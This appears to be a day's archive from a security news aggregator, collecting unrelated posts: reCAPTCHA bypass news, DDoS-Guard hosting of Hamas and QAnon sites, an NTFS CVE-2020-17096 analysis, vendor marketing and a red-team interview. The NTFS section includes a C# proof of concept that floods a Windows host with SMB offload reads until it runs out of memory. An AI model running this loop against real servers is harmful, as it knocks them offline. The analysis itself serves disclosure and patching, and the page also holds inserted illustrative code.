Daily Archives: January 5, 2021

Google Speech-to-Text API Can Help Attackers Easily Bypass Google reCAPTCHA

A three-year-old attack technique to bypass Google's audio reCAPTCHA by using its own Speech-to-Text API has been found to still work with 97% accuracy. Researcher Nikolai Tschacher disclosed his findings in a proof-of-concept (PoC) of the attack on January 2. "The idea of the attack is very simple: You grab the MP3 file of the audio reCAPTCHA and you submit it to Google's own speech-to-text API

NIST SP 800-128 – Because Patching May Never Fix Your Hidden Flaws

Over the last few years, the idea of patching systems to correct flaws has graduated from an annoying business disruption to a top priority. With all of the notorious vulnerabilities that can wreak total havoc, the time it takes to patch becomes a minor inconvenience when weighed against both the technical challenges and possible regulatory penalties […]

The post NIST SP 800-128 – Because Patching May Never Fix Your Hidden Flaws appeared first on The State of Security.

Keeping Your Garage Secure Using a Raspberry Pi

It is always unfortunate when the garage door is left open when you leave for an extended period of time. This has happened to me a couple of times. By leaving the garage door open, I was inviting unwanted guests into the garage. An unwanted guest can be animals looking for a meal and spreading […]

The post Keeping Your Garage Secure Using a Raspberry Pi appeared first on The State of Security.

Hamas May Be Threat to 8chan, QAnon Online

In October 2020, KrebsOnSecurity looked at how a web of sites connected to conspiracy theory movements QAnon and 8chan were being kept online by DDoS-Guard, a dodgy Russian firm that also hosts the official site for the terrorist group Hamas. New research shows DDoS-Guard relies on data centers provided by a U.S.-based publicly traded company, which experts say could be exposed to civil and criminal liabilities as a result of DDoS-Guard’s business with Hamas.

Many of the IP address ranges in this map of QAnon and 8Chan-related sites are assigned to VanwaTech. Source: twitter.com/Redrum_of_Crows

Last year’s story examined how a phone call to Oregon-based CNServers was all it took to briefly sideline multiple websites related to 8chan/8kun — a controversial online image board linked to several mass shootings — and QAnon, the far-right conspiracy theory which holds that a cabal of Satanic pedophiles is running a global child sex-trafficking ring and plotting against President Donald Trump.

From that piece:

A large number of 8kun and QAnon-related sites (see map above) are connected to the Web via a single Internet provider in Vancouver, Wash. called VanwaTech (a.k.a. “OrcaTech“). Previous appeals to VanwaTech to disconnect these sites have fallen on deaf ears, as the company’s owner Nick Lim reportedly has been working with 8kun’s administrators to keep the sites online in the name of protecting free speech.

After that story, CNServers and a U.K.-based hosting firm called SpartanHost both cut ties with VanwaTech. Following a brief disconnection, the sites came back online with the help of DDoS-Guard, an Internet company based in Russia. DDoS-Guard is now VanwaTech’s sole connection to the larger Internet.

A review of the several thousand websites hosted by DDoS-Guard is revelatory, as it includes a vast number of phishing sites and domains tied to cybercrime services or forums online.

Replying to requests for comment from a CBSNews reporter following up on my Oct. 2020 story, DDoS-Guard issued a statement saying, “We observe network neutrality and are convinced that any activity not prohibited by law in our country has the right to exist.”

But experts say DDoS-Guard’s business arrangement with a Denver-based publicly traded data center firm could create legal headaches for the latter thanks to the Russian company’s support of Hamas.

In a press release issued in late 2019, DDoS-Guard said its services rely in part on a traffic-scrubbing facility in Los Angeles owned by CoreSite [NYSE:COR], a real estate investment trust which invests in “carrier-neutral data centers and provides colocation and peering services.”

This facilities map published by DDoS-Guard suggests the company’s network actually has at least two points of presence in the United States.

Hamas has long been named by the U.S. Treasury and State departments as a Specially Designated Global Terrorist (SDGT) organization. Under such a designation, any U.S. person or organization that provides money, goods or services to an SDGT entity could face civil and/or criminal prosecution and hefty fines ranging from $250,000 to $1 million per violation.

Sean Buckley, a former Justice Department prosecutor with the law firm Kobre & Kim, said U.S. persons and companies within the United States “are prohibited from any transaction or dealing in property or interests in property blocked pursuant to an entity’s designation as a SDGT, including but not limited to the making or receiving of any contribution of funds, goods, or services to or for the benefit of individuals or entities so designated.”

CoreSite did not respond to multiple requests for comment. But Buckley said companies can incur fines and prosecution for violating SDGT sanctions even when they don’t know that they are doing so.

In 2019, for example, a U.S. based cosmetics company was fined $1 million after investigators determined its eyelash kits were sourcing materials from North Korea, even though the supplier in that case told the cosmetics firm the materials had come from China.

“U.S. persons or companies found to willfully violate these regulations can be subject to criminal penalties under the International Emergency Economic Powers Act,” Buckley said. “However, even in the case that they are unaware they’re violating these regulations, or if the transaction isn’t directly with the sanctioned entity, these companies still run a risk of facing substantial civil and monetary penalties by the Department of Treasury’s Office of Foreign Asset Control if the sanctioned entity stands to benefit from such a transaction.”

DDoS-Guard said its partnership with CoreSite will help its stable of websites load more quickly and reliably for people visiting them from the United States. It is possible that when and if CoreSite decides it’s too risky to continue doing business with DDoS-Guard, sites like those affiliated with Hamas, QAnon and 8Chan may become more difficult to reach.

Meanwhile, DDoS-Guard customer VanwaTech continues to host a slew of sites promoting the conspiracy theory that the U.S. 2020 presidential election was stolen from President Donald Trump via widespread voting fraud and hacked voting machines, including maga[.]host, donaldsarmy[.]us, and donaldwon[.]com.

These sites are being used to help coordinate a protest rally in Washington, D.C. on January 6, 2021, the same day the U.S. Congress is slated to count electoral votes certified by the Electoral College, which in December elected Joseph R. Biden as the 46th president of The United States.

In a tweet late last year, President Trump urged his supporters to attend the Jan. 6 protest, saying the event “will be wild.”

8chan, which has rebranded as 8kun, has been linked to white supremacism, neo-Nazism, antisemitism, multiple mass shootings, and child pornography. The FBI in 2019 identified QAnon as a potential domestic terror threat, noting that some of its followers have been linked to violent incidents motivated by fringe beliefs.

NTFS Remote Code Execution (CVE-2020-17096) Analysis


This is an analysis of the CVE-2020-17096 vulnerability published by Microsoft on December 12, 2020. This remote code execution vulnerability, assessed as Exploitation: "More Likely", grabbed our attention among the last Patch Tuesday fixes.

Diffing ntfs.sys

Comparing the patched driver to the unpatched version with BinDiff, we saw that there’s only one changed function, NtfsOffloadRead.


The function is rather big, and from a careful comparison of the two driver versions, the only changed code is located at the very beginning of the function:

BinDiff: NtfsOffloadRead (unpatched version, decompiled pseudocode)

uint NtfsOffloadRead(PIRP_CONTEXT IrpContext, PIRP Irp)
{
  PVOID decoded = NtfsDecodeFileObjectForRead(...);
  if (!decoded) {
    if (NtfsStatusDebugFlags) {
      // ...
    }
    // *** Change 1: First argument changed from NULL to IrpContext
    NtfsExtendedCompleteRequestInternal(NULL, Irp, 0xc000000d, 1, 0);
    // *** Change 2: The following if block was completely removed
    if (IrpContext && *(PIRP *)(IrpContext + 0x68) == Irp) {
      *(PIRP *)(IrpContext + 0x68) = NULL;
    }
    if (NtfsStatusDebugFlags) {
      // ...
    }
    return 0xc000000d;
  }

  // The rest of the function...
}

Triggering the vulnerable code

From the name of the function, we deduced that it’s responsible for handling offload read requests, part of the Offloaded Data Transfers functionality introduced in Windows 8. An offload read can be requested remotely via SMB by issuing the FSCTL_OFFLOAD_READ control code.

Indeed, by issuing the FSCTL_OFFLOAD_READ control code we’ve seen that the NtfsOffloadRead function is being called, but the first if branch is skipped. After some experimentation, we saw that one way to trigger the branch is by opening a folder, not a file, before issuing the offload read.

Exploring exploitation options

We looked at each of the two changes and tried to come up with the simplest way to cause some trouble to a vulnerable computer.

  • First change: The NtfsExtendedCompleteRequestInternal function wasn’t receiving the IrpContext parameter.

    Briefly looking at NtfsExtendedCompleteRequestInternal, it seems that if the first parameter is NULL, it is simply ignored. Otherwise, the numerous fields of the IrpContext structure are freed using functions such as ExFreePoolWithTag. The code is rather long and we didn't analyze it thoroughly, but from a quick glance we didn't find a way to misuse the fact that those functions aren't being called in the vulnerable version. We observed, though, that the bug causes a memory leak in the non-paged pool, which is guaranteed to reside in physical memory.

    We implemented a small tool that issues offload reads in an infinite loop. After a couple of hours, our vulnerable VM ran out of memory and froze, no longer responding to any input. Below you can see the Task Manager screenshots and the code that we used.

  • Second change: An IRP pointer field, part of IrpContext, was set to NULL.

    From our quick attempt, we didn’t find a way to misuse the fact that the IRP pointer field is set to NULL. If you have any ideas, let us know.
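To make the first change concrete, here is a constructed C model of the error path shown in the diff (added here; it is not the NTFS driver's code): a completion routine that ignores a NULL context is called with NULL in the unpatched version and with the context in the patched one, and a counter stands in for non-paged pool usage. The IRP_CONTEXT layout, the field names and the two stand-in allocations are assumptions; the IRP pointer clearing from the second change is kept only to show that it frees nothing.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdlib.h>

/* Constructed model of the NtfsOffloadRead error path (not Microsoft's code).
 * The real IrpContext has many pool-backed fields; two buffers stand in here. */

#define STATUS_INVALID_PARAMETER 0xc000000dU

/* Stand-in for non-paged pool usage: every allocation not yet freed. */
static size_t live_pool_allocations = 0;

static void *pool_alloc(size_t n)
{
    live_pool_allocations++;
    return malloc(n);
}

static void pool_free(void *p)
{
    if (p) {
        live_pool_allocations--;
        free(p);
    }
}

typedef struct irp {
    unsigned id;
} IRP, *PIRP;

typedef struct irp_context {
    PIRP originating_irp;  /* the IRP pointer field at IrpContext + 0x68 in the diff */
    void *scratch_a;       /* stand-ins for the fields released with ExFreePoolWithTag */
    void *scratch_b;
} IRP_CONTEXT, *PIRP_CONTEXT;

static PIRP_CONTEXT create_irp_context(PIRP irp)
{
    PIRP_CONTEXT ctx = pool_alloc(sizeof *ctx);
    ctx->originating_irp = irp;
    ctx->scratch_a = pool_alloc(64);
    ctx->scratch_b = pool_alloc(64);
    return ctx;
}

/* Models NtfsExtendedCompleteRequestInternal: a NULL context is simply
 * ignored; a real context has its pool allocations released. */
static unsigned complete_request(PIRP_CONTEXT ctx, PIRP irp, unsigned status)
{
    (void)irp;  /* IRP completion itself is not modelled */
    if (ctx) {
        pool_free(ctx->scratch_a);
        pool_free(ctx->scratch_b);
        pool_free(ctx);
    }
    return status;
}

/* decode_ok == false is the branch the analysis reaches by opening a directory.
 * patched selects the post-fix behaviour from the diff. */
static unsigned offload_read(PIRP_CONTEXT ctx, PIRP irp, bool decode_ok, bool patched)
{
    if (!decode_ok) {
        if (patched) {
            /* Change 1 applied: the context is handed to the completion routine. */
            return complete_request(ctx, irp, STATUS_INVALID_PARAMETER);
        }
        /* Unpatched: NULL is passed, so nothing ever frees ctx or its fields. */
        complete_request(NULL, irp, STATUS_INVALID_PARAMETER);
        /* The block removed by change 2: it only detaches the IRP from the leaked context. */
        if (ctx && ctx->originating_irp == irp)
            ctx->originating_irp = NULL;
        return STATUS_INVALID_PARAMETER;
    }
    /* The success path of the real function is not modelled. */
    return complete_request(ctx, irp, 0);
}

/* Issues n offload reads that all fail decoding and returns how many
 * pool allocations are still live afterwards (0 means no leak). */
size_t live_allocations_after(unsigned n, bool patched)
{
    live_pool_allocations = 0;
    for (unsigned i = 0; i < n; i++) {
        IRP irp = { i };
        PIRP_CONTEXT ctx = create_irp_context(&irp);
        offload_read(ctx, &irp, false, patched);
    }
    return live_pool_allocations;
}
```

Each failing request leaves three allocations behind in the unpatched model, which is the same per-request growth that eventually exhausted the VM described below.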

What about remote code execution?

We’re curious about that as much as you are. Unfortunately, there’s a limited amount of time that we can invest in satisfying our curiosity. We went as far as finding the vulnerable code and triggering it to cause a memory leak and an eventual denial of service, but we weren’t able to exploit it for remote code execution.

It is possible that there’s no actual remote code execution here, and it was marked as such just in case, as it happened with the “Bad Neighbor” ICMPv6 Vulnerability (CVE-2020-16898). If you have any insights, we’ll be happy to hear about them.

CVE-2020-17096 POC (Denial of Service)

Before. An idle VM with a standard configuration and no running programs.

After. The same idle VM after triggering the memory leak, unresponsive.

using (var trans = new Smb2ClientTransport())
{
    var ipAddress = System.Net.IPAddress.Parse(ip);
    trans.ConnectShare(server, ipAddress, domain, user, pass, share, SecurityPackageType.Negotiate, true);

    // Open a directory rather than a file, so that NtfsOffloadRead takes the
    // vulnerable branch. The open call itself is missing from the published
    // snippet; only its desired-access argument survived:
    //     FsDirectoryDesiredAccess.GENERIC_READ | FsDirectoryDesiredAccess.GENERIC_WRITE,

    // FSCTL_OFFLOAD_READ_INPUT as defined in MS-FSCC (the type name is assumed here;
    // the original snippet only shows the field assignments)
    var offloadReadInput = new FSCTL_OFFLOAD_READ_INPUT();
    offloadReadInput.Size = 32;
    offloadReadInput.FileOffset = 0;
    offloadReadInput.CopyLength = 0;

    byte[] requestInputOffloadRead = TypeMarshal.ToBytes(offloadReadInput);

    while (true)
    {
        trans.SendIoctlPayload(CtlCode_Values.FSCTL_OFFLOAD_READ, requestInputOffloadRead);
        trans.ExpectIoctlPayload(out _, out _);
    }
}

C# code that causes the memory leak and the eventual denial of service. It was used with the Windows Protocol Test Suites.

Nature vs. Nurture Tip 3: Employ SCA With SAST

For this year's State of Software Security v11 (SOSS) report, we examined how both the "nature" of applications and how we "nurture" them contribute to the time it takes to close out a security flaw. We found that the "nature" of applications, like size or age, can have a negative effect on how long it takes to remediate a security flaw. But taking steps to "nurture" the security of applications, like using multiple application security (AppSec) testing types, can have a positive effect on how long it takes to remediate security flaws.

In our first blog, Nature vs. Nurture Tip 1: Use DAST With SAST, we explored how organizations that combine DAST with SAST address 50 percent of their open security findings almost 25 days faster than organizations that only use SAST. In our second blog, Nature vs. Nurture Tip 2: Scan Frequently and Consistently, we addressed the benefits of frequent and consistent scanning by highlighting the SOSS finding that organizations that scan their applications at least daily reduced time to remediation by more than a third, closing 50 percent of security flaws in 2 months.

For our third tip, we will explore the importance of software composition analysis (SCA) and how, when used in conjunction with static application security testing (SAST), it can shorten the time it takes to address security flaws.

What is SCA and why is it important?

SCA inspects open source code for vulnerabilities. Some assume that open source code is more secure than first-party code because there are "more eyes on it," but that is often not the case. In fact, according to our SOSS report, almost one-third of applications have more security findings in their third-party libraries than in primary code. Given that a typical Java application is 97 percent third-party code, this is a concerning statistic.


Since SCA is the only AppSec testing type that can identify vulnerabilities in open source code, if you don't employ SCA, you could find yourself the victim of a costly breach. In fact, in 2017, Equifax suffered a massive data breach stemming from a vulnerability in Apache Struts that compromised the data, including Social Security numbers, of more than 143 million Americans. Following the breach, Equifax's stock fell over 13 percent.

How can SCA with SAST shorten time to remediation?

If you are only using static analysis to assess the security of your code, your attack surface is likely bigger than you think. You need to consider third-party code as part of your attack surface, which is only uncovered by using SCA.

By incorporating software composition analysis into your security testing mix, you can find and address more flaws. According to SOSS, organizations that employ "good" scanning practices (like SCA with SAST) tend to be more mature and further along in their AppSec journey. And organizations with mature AppSec programs tend to remediate flaws faster. For example, employing SCA with SAST cuts the time to remediate 50 percent of security flaws by six days.

Practices that affect remediation

For more information on using SCA with SAST, or for additional tips on nurturing your applications, check out our recent State of Software Security report.


One month after ransomware attack, Metro Vancouver’s transit system still not up to speed

TransLink, Metro Vancouver’s public transportation agency, has warned its staff that hackers accessed their personal bank account details and other information. The warning came in an internal email to workers approximately one month after Translink was struck by the Egregor ransomware and passengers had their journeys disrupted. Read more in my article on the Hot for Security blog.

The dynamic duo: How to build a red and blue team to strengthen your cybersecurity, Part 1

The security community is continuously changing, growing, and learning from each other to better position the world against cyber threats. In the first post of our new Voice of the Community blog series, Microsoft Product Marketing Manager Natalia Godyla talks with Jake Williams, Founder of Rendition Infosec. In part one of this blog Jake shares his insights on the 2020 threat landscape—who to watch for and why—and how to think about red and blue teaming within your organization.

Looking back at the threat landscape of 2020, what stands out?  

The biggest thing that stands out has to be the continued ransomware advances. With IANS, I actually coined the term ransomware 2.0 in early 2019. We were trying to differentiate between the drive-by ransomware attacks and what I call the more APT-style ransomware attacks, where they’re doing lateral movement and actively targeting backups before encryption. Disaster recovery (DR) plans work for the former but really not the latter because the latter cases are actively targeting disaster recovery infrastructure. What I saw this year was just a lot of advancement in attacks.

The second thing is that the number of different groups that are using that commodity malware has definitely gone up. They’re using that commodity malware to get back into orbit for initial access into a network. We’re seeing a lot more of that, like TrickBot. Cybersecurity professionals I’m talking to say, “the TrickBot takedown” but it was an interruption, not a takedown, unlike other malware and botnets in the past that have been wiped out. DNSChanger is a good example. DNSChanger was cut off at the knees but not TrickBot. This is a flesh wound.

We’re seeing a lot more of this commodity malware being used as an entryway. This is the stuff that a lot of folks, myself included, have been talking about for years. This is always a risk. You can’t just say, “Don’t worry, Microsoft Defender Antivirus caught and quarantined it so we’re good now.” From maybe mid-September on, it’s been even more viral than the rest of the year put together. It’s really accelerating, too.

What critical threat groups should security teams be actively monitoring? 

The week before last, I was in a dark web forum and an account that I and a number of other folks in the intel community assess with moderate confidence to be associated with Ryuk was advertising for help with their ransomware operations. They’re looking for experienced ransomware operators, and they have a whole set of criteria, including that they want to see a history that you’re getting an average $400,000 payout. They haven’t asked for help in the past. They have more work than they can handle. That gives you an idea of scope, and I think it comes from the commodity malware. Before now, I haven’t seen large, established ransomware groups advertising for help with their operations. If they thought those accesses were going to last forever, they wouldn’t worry about recruiting others right now.

There’s definitely a place for dark web monitoring but most organizations don’t have the maturity level where they’re getting a good return on that investment. Because even if I tell you that cybercrime groups are recruiting, how do I take that and turn that into something actionable that will help with detection and prevention? I don’t know how much any guidance I provide will help if you’re not patching domain controllers.

From a cybercrime standpoint, we’re seeing a lot more lateral movement being critical to cybercriminals’ attacks. We’re not seeing as many point attacks where they land a phishing email and bam, they’ve extracted a bunch of data and gone. It sounds almost like a cop-out but focus on lateral movement because it kills two birds with one stone. Nation-state groups have to do a lateral movement. So do cybercrime groups to get maximum payouts. Once they’ve had a bite of that big apple, how do they ever go back? I think you’re seeing more groups spending in some cases up to six weeks in a network before they’re doing data extraction and playing a little bit of a longer game versus that immediate gratification.

Cybersecurity mixes both defensive and offensive practices to combat cybercrime. How should organizations think about red and blue teaming in their organization? Do organizations need both, and why?  

A huge majority of people who get into cybersecurity these days want to be red team. I get it. It’s sexy. Bottom line, if you’re thinking of red team as those folks who are actually attempting to penetrate your internal network, I think the number is 1 to 20, 1 to 25, or something like that compared to blue team. You need a lot less red team focus. I’m not saying that organizations where red team is similarly sized to blue don’t provide value. They definitely do, but it’s a question of could you take those same resources and plug them elsewhere and get more value? I think generally, I need a lot more defense than I need offense.

In way too many organizations that have much more balanced red and blue teams, I see a lot of red teams identifying problems that the blue team simply can’t fix from a resourcing standpoint. I also am working with organizations that have very large red teams but haven’t yet moved into hunt teaming. In those situations, I don’t know whether you put hunt under red or blue. I’m ambivalent there but the bottom line is I do need the red team, but I need them for a lot less than a lot of people use them for. I say that as an ex-government hacker; and I still do red team occasionally, but it’s just not where most organizations are going to get the most significant return on investment. I’m not trying to say red team isn’t important but generally, we need to structure significantly more blue team people than red team, and that’s just an unpopular thing for a lot of people to hear.

If you don’t have a solid blue team and have holes today in your defenses, you shouldn’t have a red team. When people say, “We need our own internal red team,” my question is, “Have you had an external red team come in and do a red team evaluation? And if you have, have you actioned those findings?” Not one of them but all of them. If the answer is no, we need to step back and figure out what we need to do. Let’s make sure that you’ve got a blue team that is functioning today and ready to roll forward with the recommendations from the red team. Separate from pragmatism, there’s also a legality issue. Knowing about something and not doing anything about it puts you in a more legally compromising position than not knowing about it at all.

That’s what we find a lot of folks with internal red teams end up with. They’ve got this red team that is basically pushing identified risks into a funnel. How much are we stuffing that funnel? How much do we need defense versus offense?

How does an organization know when to hire an internal red team? What’s the breaking point?

A lot of that depends on the reaction. How quickly are you actioning those findings? If you’re in a spot where you fix all the findings from the annual red team in two months, that’s when I would say, “Yes, without a shadow of a doubt, let’s go hire a red team.” Because that’s going to give me more of that constant churn of findings. On the other hand, if it takes you nine months to get through those findings, you’re going to have another external red team likely in a month anyway. Where’s our value there? If it takes you somewhere in the middle, a lot of it is going to depend on how much risk do we accept.

When we’re documenting where we have gaps and where we don’t, it comes down to where can I get the best return on my investment for our organization? If I still have a lot of blue team gaps, investing in red team would be throwing more gaps at blue team, which causes huge morale issues.

Keep an eye out for the second part of the interview, in which Jake Williams shares best practices on how to structure and evolve red and blue teaming within your organization.

To learn more about Microsoft Security solutions visit our website. Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity or on LinkedIn for the latest news and updates on cybersecurity.

The post The dynamic duo: How to build a red and blue team to strengthen your cybersecurity, Part 1 appeared first on Microsoft Security.

Announcing Veracode in AWS Marketplace: Streamlining Secure Software Development for AWS Customers

Digital transformation continues to accelerate, and with it, businesses continue to modernize their technological environments, leveraging developer-first cloud-native solutions to build, host, and secure their software. At Veracode, we continue to see customers leveraging large cloud providers, such as AWS, as a central platform to conduct these activities. Customers can take advantage of the many native services available from AWS as well as procure and manage relationships with AWS-certified partner solutions, such as Veracode, through the AWS Marketplace.

That is why we are pleased to announce the launch of our public listing of Veracode Security Labs on the AWS Marketplace. This listing also enables us to sell our full portfolio of solutions through AWS Marketplace Private Offers. Buying through Marketplace creates more buying options for customers and enables AWS customers to quickly purchase and deploy Veracode's leading SaaS software security solutions while centralizing billing through AWS. For AWS customers participating in AWS' Enterprise Discount Program (EDP), purchasing Veracode through the marketplace can drive additional benefits and potential savings with AWS, as a portion of the cost of Veracode can be applied towards your overall annual spending obligations with AWS.

Since launch, several large customers in North America and Europe have successfully purchased Veracode's solutions via the AWS Marketplace, and are recognizing the variety of benefits offered to them by AWS.

Why Veracode?

When it comes to building effective and secure applications on a tight schedule, security tools need to be flexible enough to integrate and automate seamlessly into existing processes and workflows, but capable enough to get the job done. Through Veracode's cloud-native application security (AppSec) solutions we aim to enable the speed, automation, and top-level scanning tools needed to write more secure code and continue hitting deadlines.

With Veracode's solutions integrated into established processes, AppSec quickly becomes a competitive edge. In addition to the right scanning and testing tools embedded into critical stages of the software development lifecycle, Veracode enables organizations like yours to improve customer confidence through enhanced security, reduced risk, and proven compliance.

AppSec management and measurement is simplified through reliable metrics, progress demonstration, and clear goals. In addition, Veracode's 1% false-positive rate means less time spent chasing the wrong flaws and more time ensuring your DevSecOps efforts stay on track to keep projects on schedule. It also means a shortened sales cycle that keeps businesses one step ahead of the competition.

There's no need for lengthy security questionnaires with an established and functioning AppSec program, and sales are not lost due to security concerns from prospects. When Veracode's cloud-native SaaS platform is in place, it's possible to start scanning on day one to begin proving compliance and ensuring the quality of your code without missing a beat.

Secure software from the start

Having critical flexibility in the cloud with robust testing at your fingertips means that the security of your software is easier to manage through deployment and beyond. Through our integrations with AWS CodeStar and other developer tools, we deliver the critical functionality that developers need to initiate security scans, including right from AWS CodePipeline and AWS CodeBuild, saving vital remediation time. We also offer support for AWS Software Development Kits in Python, Node.js, and JavaScript, as well as support for Lambda functions.

Ready to get started integrating Veracode solutions into your AWS environment and improve the state of your organization's AppSec? Visit our page on AWS Marketplace for more information, and learn about how our tools integrate with AWS here.

The Road to XDR

XDR (eXtended Detection and Response) is a cybersecurity acronym being used by most vendors today.  It is not a new strategy. It’s been around for a while but the journey for customers and vendors has been slow for many reasons. For McAfee, XDR has been integral to our vision, strategy and design philosophy that has guided our solution development for many years. Understanding our road to XDR can help your organization map your XDR journey.

The Building Pressure for XDR

Let's start with why XDR? The cry for XDR reflects where cybersecurity is today, with fragmented, cumbersome and ineffective security, and where people want to go. In my CISO conversations it is well noted that security operations centers (SOCs) are struggling. Disjointed control points and disparate tools lead to ineffective security teams. They allow adversaries to move laterally across the infrastructure undetected, moving in intentionally erratic ways to avoid detection. Analysts only learn of this if they manually connect the thousand dots, which is time consuming and leaves the adversaries ample dwell time to do damage. It's no secret that there is a lack of security expertise, and the teams that do exist are regularly tested. Their investigations are cumbersome, highly manual, and riddled with blind spots. It's nearly impossible to prioritize efforts, leaving the SOC simply buried in reactive cycles and alert fatigue. Bottom line: SOC metrics are getting worse, while adversaries are becoming more sophisticated and creative in carrying out their mission.

XDR has the potential to be a one-stop solution to alleviating these SOC issues and improving operational inefficiencies.

XDR Options

Many cybersecurity providers are trying to offer an XDR capability of some sort. They promise to provide visibility and control across all vectors, and offer more analysis, context and automation to obtain faster and better response when reacting to a threat. Point players are limited to expertise in their domain (endpoint or network) and can't offer a critical, proven cross-portfolio platform. After all, can your endpoint platform offer true XDR functionality if it's not also connected to network, cloud and web?

McAfee’s long-time mantra has been Better Together. That mantra underscores our commitment to deliver comprehensive security that works cohesively across all threat vectors – device, network, web and cloud and with non-McAfee products.  Industry analysts and customers agree that McAfee is well positioned to deliver a solid XDR offering given our platform strategy and portfolio.

There is more to the McAfee XDR Story

Now, what if you had that same comprehensive XDR capability that not only offered visibility and control across the vectors, but also allowed you to get ahead of the adversary and empowered you to be more proactive? It could give you a heads up on threats that are likely to attack you based on global and industry trends and on what your local environment looks like. With this highly credible prediction comes prescribed guidance on how to counter the threat before it hits you. Imagine it also supplies prescriptive actions you can take to protect your users, data, applications and devices, spanning from device to cloud. Other XDR conversations can't take the conversation to this level of proactivity. McAfee can, in our recently announced MVISION XDR.

Not only does McAfee take XDR to the next level, it also helps you mitigate cyber risk by letting you prioritize and focus on what matters most. What if your threat response were prioritized by impact to the organization? That requires understanding what the attackers are targeting and how close they are to the most sensitive data, based on the users and devices involved. MVISION XDR offers this context and data-awareness to focus your analysts on what counts. For example, a threat that jeopardizes sensitive data on a finance executive’s device is automatically a higher priority than a possible threat on a general-purpose device holding no sensitive data. This data-awareness is rarely addressed in other XDR conversations, but it is in the recently announced MVISION XDR.
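To make the "data-aware prioritization" idea concrete, here is an added illustrative example, written for this page and not taken from MVISION XDR or any McAfee code, of how a SOC might rank alerts by business impact rather than by detection confidence alone. The asset inventory, the sample alerts, the classification and role weights, and the scoring formula are all constructed assumptions for the example. The point it shows is the inversion the text describes: a medium-confidence alert on an executive's laptop holding restricted data outranks a high-confidence alert on a kiosk with no sensitive data. It also handles a case a practitioner will hit immediately, an alert for a host that is missing from the inventory, by scoring it with a conservative default and flagging it rather than letting the gap quietly push it to the bottom of the queue.

```python
from dataclasses import dataclass
from typing import Dict, List, Optional

# Assumed weights for the example: how bad exposure of data at this
# classification level is (0..1). Real programmes tune these per organisation.
DATA_SENSITIVITY = {"public": 0.1, "internal": 0.4, "confidential": 0.7, "restricted": 1.0}

# Assumed weights for how much reach a compromised identity of this role has.
ROLE_WEIGHT = {"standard": 0.3, "privileged": 0.7, "executive": 0.9, "domain_admin": 1.0}


@dataclass(frozen=True)
class Asset:
    hostname: str
    owner_role: str            # key into ROLE_WEIGHT
    data_classification: str   # key into DATA_SENSITIVITY
    internet_exposed: bool = False


@dataclass(frozen=True)
class Alert:
    alert_id: str
    hostname: str
    technique: str      # e.g. an ATT&CK technique ID reported by the detector
    confidence: float   # detector confidence in the range 0.0 .. 1.0


@dataclass(frozen=True)
class Prioritised:
    alert_id: str
    risk: float
    unknown_asset: bool  # True when the host was not in the inventory


def impact(asset: Asset) -> float:
    """Business impact of this asset being compromised, 0..1 (assumed formula)."""
    base = 0.6 * DATA_SENSITIVITY[asset.data_classification] + 0.4 * ROLE_WEIGHT[asset.owner_role]
    if asset.internet_exposed:
        base += 0.1  # reachable from outside: a foothold here is easier to obtain and abuse
    return min(base, 1.0)


def prioritise(alerts: List[Alert], inventory: Dict[str, Asset]) -> List[Prioritised]:
    """Rank alerts by confidence x impact, highest risk first."""
    ranked: List[Prioritised] = []
    for alert in alerts:
        asset: Optional[Asset] = inventory.get(alert.hostname)
        unknown = asset is None
        if unknown:
            # Inventory gap: assume an ordinary user device holding internal data,
            # and flag it so an analyst fixes the inventory instead of ignoring it.
            asset = Asset(alert.hostname, "standard", "internal")
        risk = round(alert.confidence * impact(asset), 3)
        ranked.append(Prioritised(alert.alert_id, risk, unknown))
    ranked.sort(key=lambda p: p.risk, reverse=True)
    return ranked


def sample_queue() -> List[Prioritised]:
    """Constructed inventory and alerts for the example (not real data)."""
    inventory = {
        "cfo-laptop":   Asset("cfo-laptop", "executive", "restricted"),
        "lobby-kiosk":  Asset("lobby-kiosk", "standard", "public"),
        "web-01":       Asset("web-01", "standard", "internal", internet_exposed=True),
    }
    alerts = [
        Alert("A1", "lobby-kiosk", "T1059", confidence=0.95),  # high confidence, no data
        Alert("A2", "cfo-laptop", "T1003", confidence=0.60),   # medium confidence, restricted data
        Alert("A3", "web-01", "T1190", confidence=0.80),       # internet-facing server
        Alert("A4", "build-host-7", "T1021", confidence=0.90), # host missing from inventory
    ]
    return prioritise(alerts, inventory)


if __name__ == "__main__":
    for p in sample_queue():
        flag = " (asset not in inventory)" if p.unknown_asset else ""
        print(f"{p.alert_id}: risk={p.risk:.3f}{flag}")
```

Run stand-alone it prints the queue in risk order, with the CFO laptop alert first and the kiosk alert last despite the kiosk detector being far more confident. The formula itself is deliberately simple; what matters for the practitioner is that the ranking consumes asset context (data classification, owner role, exposure) that the detector does not have, and that missing context is surfaced rather than silently scored as zero.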

Let’s look at McAfee’s journey and investment in XDR and how we arrived at this exceptional XDR approach.

McAfee XDR Journey

McAfee’s XDR journey did not simply start recently because a buzzword appeared that needed to be spoken to. As noted earlier, McAfee’s mantra “Better Together” sets the stage for a unified security approach, which is core to the XDR promise. McAfee recognized early on that a multi-vendor security ecosystem is a key requirement for building a defense-in-depth security practice, because most enterprise security architectures are a heterogeneous mix of security solutions. The OpenDXL open-source community delivered the Data Exchange Layer (DXL) message bus architecture, which gave our diverse ecosystem of partners, from threat intelligence platforms to orchestration tools, a common transport mechanism and information exchange protocol. McAfee is also a founding member of the Open Cybersecurity Alliance (OCA), where we contributed our DXL ontology, enabling participating vendors not only to communicate vital threat details but to tell every connected multi-vendor security solution what to do about them.

Realizing that EDR is network-blind and SIEM is endpoint-blind, we integrated McAfee EDR and SIEM. McAfee continues to deliver XDR capabilities by bringing multiple telemetry sources onto one platform, with a single console for analytics and investigation, and by driving remediation decisions with automatic enforcement across the enterprise. Combine MVISION XDR (the first proactive, data-aware and open XDR) with the newly released MVISION Marketplace and API, which further support the open security ecosystem for XDR capabilities, and organizations have a solid starting point from which to advance their visibility and control across their entire cyber infrastructure.

Before all the XDR hype, McAfee customers were already on the XDR path. They have already gained XDR capabilities and are positioned to grow with more. I encourage you to check out the video below.


The post The Road to XDR appeared first on McAfee Blogs.

Warning: Cross-Platform ElectroRAT Malware Targeting Cryptocurrency Users

Cybersecurity researchers today revealed a wide-ranging scam targeting cryptocurrency users that began as early as January last year to distribute trojanized applications to install a previously undetected remote access tool on target systems. Called ElectroRAT by Intezer, the RAT is written from ground-up in Golang and designed to target multiple operating systems such as Windows, Linux, and

Introducing: Cisco’s Innovated Transparency Report

